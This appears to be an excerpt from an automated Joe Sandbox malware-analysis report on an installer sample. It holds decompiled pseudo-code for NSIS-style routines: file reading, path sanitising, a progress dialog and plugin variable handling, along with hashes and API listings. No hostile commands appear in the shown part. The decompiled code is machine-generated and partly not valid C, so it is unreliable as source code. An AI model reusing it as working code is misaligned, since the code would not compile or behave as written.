                                                                                      • Associated: 00000001.00000002.26208378873.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.26208407009.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.26208560356.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.26208581287.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.26208601155.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.26208625683.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.26208645954.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.26208667319.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.26208698975.0000000000464000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_400000_xcVh7ZmH4Y.jbxd
                                                                                      Similarity
                                                                                      • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                                                      • String ID:
                                                                                      • API String ID: 2320649405-0
                                                                                      • Opcode ID: f4fe220c79686689299554ac50abea47664d32920eac269e7a43003585d3568b
                                                                                      • Instruction ID: 19446832cb8519ea1938040ed984131457e28e93d0b00b9b4dc42373f0e33a15
                                                                                      • Opcode Fuzzy Hash: f4fe220c79686689299554ac50abea47664d32920eac269e7a43003585d3568b
                                                                                      • Instruction Fuzzy Hash: 382177B1500705AFCB31DF68DD08B5BBBF8AF41714B058A2EEA96B22E1C734E944CB54
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 004026EC Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 153fileCOMMON
                                                                                      Download Yara Rule
                                                                                      C-Code - Quality: 87%
                                                                                      			E004026EC(intOrPtr __ebx, intOrPtr __edx, void* __edi) {
				intOrPtr _t65;
				intOrPtr _t66;
				intOrPtr _t72;
				void* _t76;
				void* _t79;

				_t72 = __edx;
				 *((intOrPtr*)(_t76 - 8)) = __ebx;
				_t65 = 2;
				 *((intOrPtr*)(_t76 - 0x4c)) = _t65;
				_t66 = E00402D84(_t65);
				_t79 = _t66 - 1;
				 *((intOrPtr*)(_t76 - 0x10)) = _t72;
				 *((intOrPtr*)(_t76 - 0x44)) = _t66;
				if(_t79 < 0) {
					L36:
					 *0x434f88 =  *0x434f88 +  *(_t76 - 4);
				} else {
					__ecx = 0x3ff;
					if(__eax > 0x3ff) {
						 *(__ebp - 0x44) = 0x3ff;
					}
					if( *__edi == __bx) {
						L34:
						__ecx =  *(__ebp - 0xc);
						__eax =  *(__ebp - 8);
						 *( *(__ebp - 0xc) +  *(__ebp - 8) * 2) = __bx;
						if(_t79 == 0) {
							 *(_t76 - 4) = 1;
						}
						goto L36;
					} else {
						 *(__ebp - 0x38) = __ebx;
						 *(__ebp - 0x18) = E0040649D(__ecx, __edi);
						if( *(__ebp - 0x44) > __ebx) {
							do {
								if( *((intOrPtr*)(__ebp - 0x34)) != 0x39) {
									if( *((intOrPtr*)(__ebp - 0x24)) != __ebx ||  *(__ebp - 8) != __ebx || E0040610E( *(__ebp - 0x18), __ebx) >= 0) {
										__eax = __ebp - 0x50;
										if(E004060B0( *(__ebp - 0x18), __ebp - 0x50, 2) == 0) {
											goto L34;
										} else {
											goto L21;
										}
									} else {
										goto L34;
									}
								} else {
									__eax = __ebp - 0x40;
									_push(__ebx);
									_push(__ebp - 0x40);
									__eax = 2;
									__ebp - 0x40 -  *((intOrPtr*)(__ebp - 0x24)) = __ebp + 0xa;
									__eax = ReadFile( *(__ebp - 0x18), __ebp + 0xa, __ebp - 0x40 -  *((intOrPtr*)(__ebp - 0x24)), ??, ??);
									if(__eax == 0) {
										goto L34;
									} else {
										__ecx =  *(__ebp - 0x40);
										if(__ecx == __ebx) {
											goto L34;
										} else {
											__ax =  *(__ebp + 0xa) & 0x000000ff;
											 *(__ebp - 0x4c) = __ecx;
											 *(__ebp - 0x50) = __eax;
											if( *((intOrPtr*)(__ebp - 0x24)) != __ebx) {
												L28:
												__ax & 0x0000ffff = E00406484( *(__ebp - 0xc), __ax & 0x0000ffff);
											} else {
												__ebp - 0x50 = __ebp + 0xa;
												if(MultiByteToWideChar(__ebx, 8, __ebp + 0xa, __ecx, __ebp - 0x50, 1) != 0) {
													L21:
													__eax =  *(__ebp - 0x50);
												} else {
													__edi =  *(__ebp - 0x4c);
													__edi =  ~( *(__ebp - 0x4c));
													while(1) {
														_t22 = __ebp - 0x40;
														 *_t22 =  *(__ebp - 0x40) - 1;
														__eax = 0xfffd;
														 *(__ebp - 0x50) = 0xfffd;
														if( *_t22 == 0) {
															goto L22;
														}
														 *(__ebp - 0x4c) =  *(__ebp - 0x4c) - 1;
														__edi = __edi + 1;
														SetFilePointer( *(__ebp - 0x18), __edi, __ebx, 1) = __ebp - 0x50;
														__eax = __ebp + 0xa;
														if(MultiByteToWideChar(__ebx, 8, __ebp + 0xa,  *(__ebp - 0x40), __ebp - 0x50, 1) == 0) {
															continue;
														} else {
															goto L21;
														}
														goto L22;
													}
												}
												L22:
												if( *((intOrPtr*)(__ebp - 0x24)) != __ebx) {
													goto L28;
												} else {
													if( *(__ebp - 0x38) == 0xd ||  *(__ebp - 0x38) == 0xa) {
														if( *(__ebp - 0x38) == __ax || __ax != 0xd && __ax != 0xa) {
															 *(__ebp - 0x4c) =  ~( *(__ebp - 0x4c));
															__eax = SetFilePointer( *(__ebp - 0x18),  ~( *(__ebp - 0x4c)), __ebx, 1);
														} else {
															__ecx =  *(__ebp - 0xc);
															__edx =  *(__ebp - 8);
															 *(__ebp - 8) =  *(__ebp - 8) + 1;
															 *( *(__ebp - 0xc) +  *(__ebp - 8) * 2) = __ax;
														}
														goto L34;
													} else {
														__ecx =  *(__ebp - 0xc);
														__edx =  *(__ebp - 8);
														 *(__ebp - 8) =  *(__ebp - 8) + 1;
														 *( *(__ebp - 0xc) +  *(__ebp - 8) * 2) = __ax;
														 *(__ebp - 0x38) = __eax;
														if(__ax == __bx) {
															goto L34;
														} else {
															goto L26;
														}
													}
												}
											}
										}
									}
								}
								goto L37;
								L26:
								__eax =  *(__ebp - 8);
							} while ( *(__ebp - 8) <  *(__ebp - 0x44));
						}
						goto L34;
					}
				}
				L37:
				return 0;
			}








                                                                                      0x004026ec
                                                                                      0x004026ee
                                                                                      0x004026f1
                                                                                      0x004026f3
                                                                                      0x004026f6
                                                                                      0x004026fb
                                                                                      0x004026ff
                                                                                      0x00402702
                                                                                      0x00402705
                                                                                      0x00402c2a
                                                                                      0x00402c2d
                                                                                      0x0040270b
                                                                                      0x0040270b
                                                                                      0x00402712
                                                                                      0x00402714
                                                                                      0x00402714
                                                                                      0x0040271a
                                                                                      0x0040287e
                                                                                      0x0040287e
                                                                                      0x00402881
                                                                                      0x00402886
                                                                                      0x004015b6
                                                                                      0x0040292e
                                                                                      0x0040292e
                                                                                      0x00000000
                                                                                      0x00402720
                                                                                      0x00402721
                                                                                      0x0040272c
                                                                                      0x0040272f
                                                                                      0x0040273b
                                                                                      0x0040273f
                                                                                      0x004027d7
                                                                                      0x004027ef
                                                                                      0x004027ff
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00402745
                                                                                      0x00402745
                                                                                      0x00402748
                                                                                      0x00402749
                                                                                      0x0040274c
                                                                                      0x00402751
                                                                                      0x00402758
                                                                                      0x00402760
                                                                                      0x00000000
                                                                                      0x00402766
                                                                                      0x00402766
                                                                                      0x0040276b
                                                                                      0x00000000
                                                                                      0x00402771
                                                                                      0x00402771
                                                                                      0x00402779
                                                                                      0x0040277c
                                                                                      0x0040277f
                                                                                      0x0040283a
                                                                                      0x00402841
                                                                                      0x00402785
                                                                                      0x0040278b
                                                                                      0x00402797
                                                                                      0x00402801
                                                                                      0x00402801
                                                                                      0x00402799
                                                                                      0x00402799
                                                                                      0x0040279c
                                                                                      0x0040279e
                                                                                      0x0040279e
                                                                                      0x0040279e
                                                                                      0x004027a1
                                                                                      0x004027a6
                                                                                      0x004027a9
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x004027ab
                                                                                      0x004027ae
                                                                                      0x004027bc
                                                                                      0x004027c2
                                                                                      0x004027d0
                                                                                      0x00000000
                                                                                      0x004027d2
                                                                                      0x00000000
                                                                                      0x004027d2
                                                                                      0x00000000
                                                                                      0x004027d0
                                                                                      0x0040279e
                                                                                      0x00402804
                                                                                      0x00402807
                                                                                      0x00000000
                                                                                      0x00402809
                                                                                      0x0040280e
                                                                                      0x0040284f
                                                                                      0x00402871
                                                                                      0x00402878
                                                                                      0x0040285d
                                                                                      0x0040285d
                                                                                      0x00402860
                                                                                      0x00402863
                                                                                      0x00402866
                                                                                      0x00402866
                                                                                      0x00000000
                                                                                      0x00402817
                                                                                      0x00402817
                                                                                      0x0040281a
                                                                                      0x0040281d
                                                                                      0x00402823
                                                                                      0x00402827
                                                                                      0x0040282a
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x0040282a
                                                                                      0x0040280e
                                                                                      0x00402807
                                                                                      0x0040277f
                                                                                      0x0040276b
                                                                                      0x00402760
                                                                                      0x00000000
                                                                                      0x0040282c
                                                                                      0x0040282c
                                                                                      0x0040282f
                                                                                      0x00402838
                                                                                      0x00000000
                                                                                      0x0040272f
                                                                                      0x0040271a
                                                                                      0x00402c33
                                                                                      0x00402c39

                                                                                      APIs
                                                                                      • ReadFile.KERNEL32(?,?,?,?), ref: 00402758
                                                                                      • MultiByteToWideChar.KERNEL32(?,00000008,?,?,?,00000001), ref: 00402793
                                                                                      • SetFilePointer.KERNEL32(?,?,?,00000001,?,00000008,?,?,?,00000001), ref: 004027B6
                                                                                      • MultiByteToWideChar.KERNEL32(?,00000008,?,00000000,?,00000001,?,00000001,?,00000008,?,?,?,00000001), ref: 004027CC
                                                                                        • Part of subcall function 0040610E: SetFilePointer.KERNEL32(?,00000000,00000000,00000001), ref: 00406124
                                                                                      • SetFilePointer.KERNEL32(?,?,?,00000001,?,?,00000002), ref: 00402878
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.26208301659.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000001.00000002.26208278739.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.26208352397.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.26208378873.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.26208407009.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.26208560356.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.26208581287.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.26208601155.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.26208625683.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.26208645954.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.26208667319.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.26208698975.0000000000464000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_400000_xcVh7ZmH4Y.jbxd
                                                                                      Similarity
                                                                                      • API ID: File$Pointer$ByteCharMultiWide$Read
                                                                                      • String ID: 9
                                                                                      • API String ID: 163830602-2366072709
                                                                                      • Opcode ID: 05ec9e9945247294569ed32eb70c3e484d87f4f0290394ce4997a83a7f1e58dd
                                                                                      • Instruction ID: 36eba916602f65c1f8b814f2f26102ddc75cc08ed25eda7b441ea0696c55e726
                                                                                      • Opcode Fuzzy Hash: 05ec9e9945247294569ed32eb70c3e484d87f4f0290394ce4997a83a7f1e58dd
                                                                                      • Instruction Fuzzy Hash: C551E975D00219AADF20EF95CA89AAEBB79FF04304F10817BE541B62D4D7B49D82CB58
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 004067C4 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 69COMMON
                                                                                      Download Yara Rule
                                                                                      C-Code - Quality: 91%
                                                                                      			E004067C4(WCHAR* _a4) {
				short _t5;
				short _t7;
				WCHAR* _t19;
				WCHAR* _t20;
				WCHAR* _t21;

				_t20 = _a4;
				if( *_t20 == 0x5c && _t20[1] == 0x5c && _t20[2] == 0x3f && _t20[3] == 0x5c) {
					_t20 =  &(_t20[4]);
				}
				if( *_t20 != 0 && E00405E83(_t20) != 0) {
					_t20 =  &(_t20[2]);
				}
				_t5 =  *_t20;
				_t21 = _t20;
				_t19 = _t20;
				if(_t5 != 0) {
					do {
						if(_t5 > 0x1f &&  *((short*)(E00405E39(L"*?|<>/\":", _t5))) == 0) {
							E00405FE8(_t19, _t20, CharNextW(_t20) - _t20 >> 1);
							_t19 = CharNextW(_t19);
						}
						_t20 = CharNextW(_t20);
						_t5 =  *_t20;
					} while (_t5 != 0);
				}
				 *_t19 =  *_t19 & 0x00000000;
				while(1) {
					_push(_t19);
					_push(_t21);
					_t19 = CharPrevW();
					_t7 =  *_t19;
					if(_t7 != 0x20 && _t7 != 0x5c) {
						break;
					}
					 *_t19 =  *_t19 & 0x00000000;
					if(_t21 < _t19) {
						continue;
					}
					break;
				}
				return _t7;
			}








                                                                                      0x004067c6
                                                                                      0x004067cf
                                                                                      0x004067e6
                                                                                      0x004067e6
                                                                                      0x004067ed
                                                                                      0x004067f9
                                                                                      0x004067f9
                                                                                      0x004067fc
                                                                                      0x004067ff
                                                                                      0x00406804
                                                                                      0x00406806
                                                                                      0x0040680f
                                                                                      0x00406813
                                                                                      0x00406830
                                                                                      0x00406838
                                                                                      0x00406838
                                                                                      0x0040683d
                                                                                      0x0040683f
                                                                                      0x00406842
                                                                                      0x00406847
                                                                                      0x00406848
                                                                                      0x0040684c
                                                                                      0x0040684c
                                                                                      0x0040684d
                                                                                      0x00406854
                                                                                      0x00406856
                                                                                      0x0040685d
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00406865
                                                                                      0x0040686b
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x0040686b
                                                                                      0x00406870

                                                                                      APIs
                                                                                      • CharNextW.USER32(?,*?|<>/":,00000000,00000000,75A43420,C:\Users\user\AppData\Local\Temp\,?,00403508,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403810), ref: 00406827
                                                                                      • CharNextW.USER32(?,?,?,00000000,?,00403508,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403810), ref: 00406836
                                                                                      • CharNextW.USER32(?,00000000,75A43420,C:\Users\user\AppData\Local\Temp\,?,00403508,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403810), ref: 0040683B
                                                                                      • CharPrevW.USER32(?,?,75A43420,C:\Users\user\AppData\Local\Temp\,?,00403508,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403810), ref: 0040684E
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.26208301659.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000001.00000002.26208278739.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.26208352397.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.26208378873.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.26208407009.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.26208560356.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.26208581287.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.26208601155.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.26208625683.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.26208645954.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.26208667319.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.26208698975.0000000000464000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_400000_xcVh7ZmH4Y.jbxd
                                                                                      Similarity
                                                                                      • API ID: Char$Next$Prev
                                                                                      • String ID: *?|<>/":$C:\Users\user\AppData\Local\Temp\
                                                                                      • API String ID: 589700163-2977677972
                                                                                      • Opcode ID: 7f8a10c6574f84f045d99a2f2ba91d71661da1c9dbe2055a6f375f6d39957bd5
                                                                                      • Instruction ID: 8e05d213a2b26a47bd0c986db1e6a85e10b5e067f284fb5e9645f7af11a9ce3c
                                                                                      • Opcode Fuzzy Hash: 7f8a10c6574f84f045d99a2f2ba91d71661da1c9dbe2055a6f375f6d39957bd5
                                                                                      • Instruction Fuzzy Hash: 7311862780161295DB313B158C44A77A2A8AF58798F56843FED86B32C1E77C8C9282AD
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 00404E54 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48windowCOMMON
                                                                                      Download Yara Rule
                                                                                      C-Code - Quality: 100%
                                                                                      			E00404E54(struct HWND__* _a4, intOrPtr _a8) {
				long _v8;
				signed char _v12;
				unsigned int _v16;
				void* _v20;
				intOrPtr _v24;
				long _v56;
				void* _v60;
				long _t15;
				unsigned int _t19;
				signed int _t25;
				struct HWND__* _t28;

				_t28 = _a4;
				_t15 = SendMessageW(_t28, 0x110a, 9, 0);
				if(_a8 == 0) {
					L4:
					_v56 = _t15;
					_v60 = 4;
					SendMessageW(_t28, 0x113e, 0,  &_v60);
					return _v24;
				}
				_t19 = GetMessagePos();
				_v16 = _t19 >> 0x10;
				_v20 = _t19;
				ScreenToClient(_t28,  &_v20);
				_t25 = SendMessageW(_t28, 0x1111, 0,  &_v20);
				if((_v12 & 0x00000066) != 0) {
					_t15 = _v8;
					goto L4;
				}
				return _t25 | 0xffffffff;
			}














                                                                                      0x00404e62
                                                                                      0x00404e6f
                                                                                      0x00404e75
                                                                                      0x00404eb3
                                                                                      0x00404eb3
                                                                                      0x00404ec2
                                                                                      0x00404ec9
                                                                                      0x00000000
                                                                                      0x00404ecb
                                                                                      0x00404e77
                                                                                      0x00404e86
                                                                                      0x00404e8e
                                                                                      0x00404e91
                                                                                      0x00404ea3
                                                                                      0x00404ea9
                                                                                      0x00404eb0
                                                                                      0x00000000
                                                                                      0x00404eb0
                                                                                      0x00000000

                                                                                      APIs
                                                                                      • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404E6F
                                                                                      • GetMessagePos.USER32 ref: 00404E77
                                                                                      • ScreenToClient.USER32(?,?), ref: 00404E91
                                                                                      • SendMessageW.USER32(?,00001111,00000000,?), ref: 00404EA3
                                                                                      • SendMessageW.USER32(?,0000113E,00000000,?), ref: 00404EC9
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.26208301659.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000001.00000002.26208278739.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.26208352397.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.26208378873.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.26208407009.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.26208560356.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.26208581287.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.26208601155.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.26208625683.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.26208645954.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.26208667319.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.26208698975.0000000000464000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_400000_xcVh7ZmH4Y.jbxd
                                                                                      Similarity
                                                                                      • API ID: Message$Send$ClientScreen
                                                                                      • String ID: f
                                                                                      • API String ID: 41195575-1993550816
                                                                                      • Opcode ID: b2affdf3b53bee8738e3b61904ea6c87bda347b462d3853a737802ef9deed65a
                                                                                      • Instruction ID: 177f1d0b32132a6560496663958852c5fe6f1b23f9da62007dee57caca3d7f28
                                                                                      • Opcode Fuzzy Hash: b2affdf3b53bee8738e3b61904ea6c87bda347b462d3853a737802ef9deed65a
                                                                                      • Instruction Fuzzy Hash: 34014C71900219BADB00DBA4DD85BFFBBB8AB54711F10012BBA50B61C0D7B49A058BA5
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 00402F93 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 40timeCOMMON
                                                                                      Download Yara Rule
                                                                                      C-Code - Quality: 100%
                                                                                      			E00402F93(struct HWND__* _a4, intOrPtr _a8) {
				short _v132;
				int _t11;
				int _t20;

				if(_a8 == 0x110) {
					SetTimer(_a4, 1, 0xfa, 0);
					_a8 = 0x113;
				}
				if(_a8 == 0x113) {
					_t20 =  *0x41ea18; // 0x4ad42
					_t11 =  *0x42aa24; // 0x4ad46
					if(_t20 >= _t11) {
						_t20 = _t11;
					}
					wsprintfW( &_v132, L"verifying installer: %d%%", MulDiv(_t20, 0x64, _t11));
					SetWindowTextW(_a4,  &_v132);
					SetDlgItemTextW(_a4, 0x406,  &_v132);
				}
				return 0;
			}






                                                                                      0x00402fa3
                                                                                      0x00402fb1
                                                                                      0x00402fb7
                                                                                      0x00402fb7
                                                                                      0x00402fc5
                                                                                      0x00402fc7
                                                                                      0x00402fcd
                                                                                      0x00402fd4
                                                                                      0x00402fd6
                                                                                      0x00402fd6
                                                                                      0x00402fec
                                                                                      0x00402ffc
                                                                                      0x0040300e
                                                                                      0x0040300e
                                                                                      0x00403016

                                                                                      APIs
                                                                                      • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402FB1
                                                                                      • MulDiv.KERNEL32(0004AD42,00000064,0004AD46), ref: 00402FDC
                                                                                      • wsprintfW.USER32 ref: 00402FEC
                                                                                      • SetWindowTextW.USER32(?,?), ref: 00402FFC
                                                                                      • SetDlgItemTextW.USER32(?,00000406,?), ref: 0040300E
                                                                                      Strings
                                                                                      • verifying installer: %d%%, xrefs: 00402FE6
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.26208301659.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000001.00000002.26208278739.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.26208352397.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.26208378873.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.26208407009.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.26208560356.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.26208581287.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.26208601155.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.26208625683.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.26208645954.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.26208667319.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.26208698975.0000000000464000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_400000_xcVh7ZmH4Y.jbxd
                                                                                      Similarity
                                                                                      • API ID: Text$ItemTimerWindowwsprintf
                                                                                      • String ID: verifying installer: %d%%
                                                                                      • API String ID: 1451636040-82062127
                                                                                      • Opcode ID: ea3fb41b8b9d1af7e43715991a6ce4dd060937d78b5a266238e4f5c2501e20f6
                                                                                      • Instruction ID: eb17ebabde20c32bd565f0ca98bf5c3c7f8a04474e671541d9d17dad0456e96b
                                                                                      • Opcode Fuzzy Hash: ea3fb41b8b9d1af7e43715991a6ce4dd060937d78b5a266238e4f5c2501e20f6
                                                                                      • Instruction Fuzzy Hash: 20014B7064020DABEF209F60DE4AFEA3B79FB04345F008039FA06B51D0DBB999559F69
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 71032655 Relevance: 9.1, APIs: 6, Instructions: 109COMMON
                                                                                      Download Yara Rule
                                                                                      C-Code - Quality: 75%
                                                                                      			E71032655() {
				intOrPtr _t24;
				void* _t26;
				intOrPtr _t27;
				signed int _t39;
				void* _t40;
				void* _t43;
				intOrPtr _t44;
				void* _t45;

				_t40 = E710312BB();
				_t24 =  *((intOrPtr*)(_t45 + 0x18));
				_t44 =  *((intOrPtr*)(_t24 + 0x1014));
				_t43 = (_t44 + 0x81 << 5) + _t24;
				do {
					if( *((intOrPtr*)(_t43 - 4)) >= 0) {
					}
					_t39 =  *(_t43 - 8) & 0x000000ff;
					if(_t39 <= 7) {
						switch( *((intOrPtr*)(_t39 * 4 +  &M71032784))) {
							case 0:
								 *_t40 = 0;
								goto L17;
							case 1:
								__eax =  *__eax;
								if(__ecx > __ebx) {
									 *(__esp + 0x10) = __ecx;
									__ecx =  *(0x7103407c + __edx * 4);
									__edx =  *(__esp + 0x10);
									__ecx = __ecx * __edx;
									asm("sbb edx, edx");
									__edx = __edx & __ecx;
									__eax = __eax &  *(0x7103409c + __edx * 4);
								}
								_push(__eax);
								goto L15;
							case 2:
								__eax = E71031510(__edx,  *__eax,  *((intOrPtr*)(__eax + 4)), __edi);
								goto L16;
							case 3:
								__ecx =  *0x7103506c;
								__edx = __ecx - 1;
								__eax = MultiByteToWideChar(__ebx, __ebx,  *__eax, __ecx, __edi, __edx);
								__eax =  *0x7103506c;
								 *((short*)(__edi + __eax * 2 - 2)) = __bx;
								goto L17;
							case 4:
								__eax = lstrcpynW(__edi,  *__eax,  *0x7103506c);
								goto L17;
							case 5:
								_push( *0x7103506c);
								_push(__edi);
								_push( *__eax);
								__imp__StringFromGUID2();
								goto L17;
							case 6:
								_push( *__esi);
								L15:
								__eax = wsprintfW(__edi, 0x71035000);
								L16:
								__esp = __esp + 0xc;
								goto L17;
						}
					}
					L17:
					_t26 =  *(_t43 + 0x14);
					if(_t26 != 0 && ( *((intOrPtr*)( *((intOrPtr*)(_t45 + 0x18)))) != 2 ||  *((intOrPtr*)(_t43 - 4)) > 0)) {
						GlobalFree(_t26);
					}
					_t27 =  *((intOrPtr*)(_t43 + 0xc));
					if(_t27 != 0) {
						if(_t27 != 0xffffffff) {
							if(_t27 > 0) {
								E71031381(_t27 - 1, _t40);
								goto L26;
							}
						} else {
							E71031312(_t40);
							L26:
						}
					}
					_t44 = _t44 - 1;
					_t43 = _t43 - 0x20;
				} while (_t44 >= 0);
				return GlobalFree(_t40);
			}











                                                                                      0x7103265f
                                                                                      0x71032661
                                                                                      0x71032665
                                                                                      0x71032674
                                                                                      0x71032678
                                                                                      0x7103267d
                                                                                      0x7103267d
                                                                                      0x71032685
                                                                                      0x7103268c
                                                                                      0x71032692
                                                                                      0x00000000
                                                                                      0x71032699
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x710326a1
                                                                                      0x710326a5
                                                                                      0x710326a8
                                                                                      0x710326ac
                                                                                      0x710326b3
                                                                                      0x710326b7
                                                                                      0x710326bd
                                                                                      0x710326bf
                                                                                      0x710326c1
                                                                                      0x710326c1
                                                                                      0x710326c8
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x710326d1
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x710326d8
                                                                                      0x710326de
                                                                                      0x710326e8
                                                                                      0x710326ee
                                                                                      0x710326f3
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x71032714
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x710326fa
